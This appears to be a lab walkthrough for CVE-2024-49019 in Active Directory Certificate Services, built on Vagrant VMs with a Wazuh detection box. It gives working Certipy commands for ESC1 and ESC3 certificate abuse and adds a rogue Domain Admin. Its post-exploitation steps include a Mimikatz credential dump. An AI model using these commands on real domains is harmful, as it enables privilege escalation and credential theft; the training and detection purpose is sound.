# Exploiting CVE-2024-49019: Certificate Authority Privilege Escalation

## Overview

CVE-2024-49019 is a vulnerability in Active Directory Certificate Services (AD CS) that allows an attacker to escalate privileges by misusing certificate-based authentication. This guide demonstrates how to exploit this vulnerability using Certipy.

---

## Credentials Table

| Virtual Machine     | Username      | Password             |
|---------------------|--------------|----------------------|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser      | $Vulnerable139      |
| Kali-VM            | vagrant       | vagrant              |
| Ubuntu-Wazuh       | wazuh         | admin                |

The **Ubuntu-Wazuh VM** is used for detection purposes. [Detection Guide](https://github.com/rayngnpc/CVE-2024-49019/blob/main/Detectionguide.md) [Mitigation](https://github.com/rayngnpc/CVE-2024-49019-rayng/blob/main/Mitigation.md)

---

## Step 1: Clone the Repository and Set Up Virtual Machines

First, clone the repository containing the necessary files:

```bash
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
```

### Install Vagrant

You must install **Vagrant** on your host machine before proceeding.

#### **For Windows**

Download and install Vagrant from [here](https://www.vagrantup.com/downloads.html), or install using PowerShell:

```powershell
choco install vagrant
```

#### **For Linux**

```bash
sudo apt update && sudo apt install vagrant -y
```

### Set Up Virtual Machines

#### **Windows Server 2022 VM**

```bash
cd windows-server2022
vagrant up
```

#### **Kali Linux VM**

```bash
cd kali-VM
vagrant up
```

#### **Wazuh Ubuntu VM**

```bash
cd WazuhUbuntu
vagrant up
```

---

## Step 2: Configure the Virtual Network

Since the exploit requires a NAT network, configure VirtualBox as follows:

### **On Windows**

Before running the command below, ensure `VBoxManage` is added to your environment variables. If not, execute the command using its full path:

```bash
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```

If `VBoxManage` is not recognized, use:

```bash
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```

### **On Linux**

```bash
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
```

Make sure to check all VMs in VirtualBox and ensure they are assigned to the network adapter `NatNetwork - NatNet1`. You can create a NAT network with a different name, but it must be in the IP range `10.0.2.0/24`.

---
## Note: Recommend set up DNS for the Wazuh Server . In this case should be DNS: 10.0.2.1 - Sometimes without internet the API check will fail and you can't get into the Wazuh Dashboard

## Step 3: Modify Hosts File

Before proceeding, ensure all VMs are turned on.

Access the **Kali Linux VM** to start the attack and update your `/etc/hosts` file:

```bash
sudo nano /etc/hosts
```

Add the following entry:

```
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
```

Save and exit.

---

## Step 4: Set Up the Environment

Navigate to the `CVE-49019` directory and activate the Python virtual environment:

```bash
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
```

---

## Step 5: Exploitation Methods

There are two ways to exploit this vulnerability: **ESC1** and **ESC3**.

### **ESC1 Method**

#### **Find Vulnerable Templates**
```bash
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
```

#### **Request Certificate**
```bash
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u 'testuser@pchau.domain.local' -p '$Vulnerable139' -template "WebServer" -upn "Administrator@pchau.domain.local" --application-policies 'Client Authentication'
```

#### **Use Certificate for LDAP Shell Access**
```bash
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
```

#### **Add a New User**
```bash
add_user badadmin
```

#### **Add User to Domain Admins Group**
```bash
add_user_to_group badadmin "Domain Admins"
```

---

### **ESC3 Method**

#### **Find Vulnerable Templates**
```bash
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
```

#### **Request Certificate from Test User**
```bash
certipy req -u testuser@pchau.domain.local -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
```
#### **Request Certificate for Domain Administrator using testuser certificate**
```bash
certipy req -u testuser@pchau.domain.local -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
```

#### **This is where This method is different than the ESC1 where it can request PKINIT and get the Hashes from TGT**
```bash
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
```
## Note: In case you Got error:  while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
There is a work around,make sure that your Host Machine has the same time as the Windows Server itself.
Make sure to do this command in order to update the Kali-Linux VM to be the same as Windows-Server.
```bash
sudo timedatectl set-ntp off

sudo rdate -n 10.0.2.121
```
## Make sure that Windows-Server has the same time-zone as the Host Machine. Consider it can't be modify because of the organization. Please consider go to Data Time Zone to change it manually to match with the Host Machine. Kali-VM and Windows Server need to have a same time as the host machine.

## You can try to force it to time sync using the command below
```bash
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
```

#### **Use Certificate to Gain Administrator Access**
```bash
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
```

---

## Step 6: What Can You Do After Exploitation?

Once administrator-level access is gained, the attacker can:

- **Create and manage user accounts**
  ```bash
  net user hacked /add
  net localgroup "Administrators" hacked /add
  ```
- **Dump credentials** using Mimikatz:
  ```bash
  sekurlsa::logonpasswords
  ```
- **Secretdump using Impacket
- **Wmiexec for accessing windows server shell
- **Change Windows Server Administrator using BloodyAD
- **Pivot and move laterally** within the network
- **Establish persistence**
- **Exfiltrate sensitive data**

For **detection and mitigation strategies**, refer to the [detection guide](https://github.com/rayngnpc/CVE-2024-49019/blob/main/Detectionguide.md).

---

## Conclusion

CVE-2024-49019 presents a significant security risk due to its ability to allow unauthorized privilege escalation. Understanding this vulnerability and deploying proper detection mechanisms, such as using **Wazuh**, is crucial for securing Active Directory environments.

For more information on securing AD CS, see [Microsoft Security CVE-2024-49019](https://nvd.nist.gov/vuln/detail/cve-2024-49019).

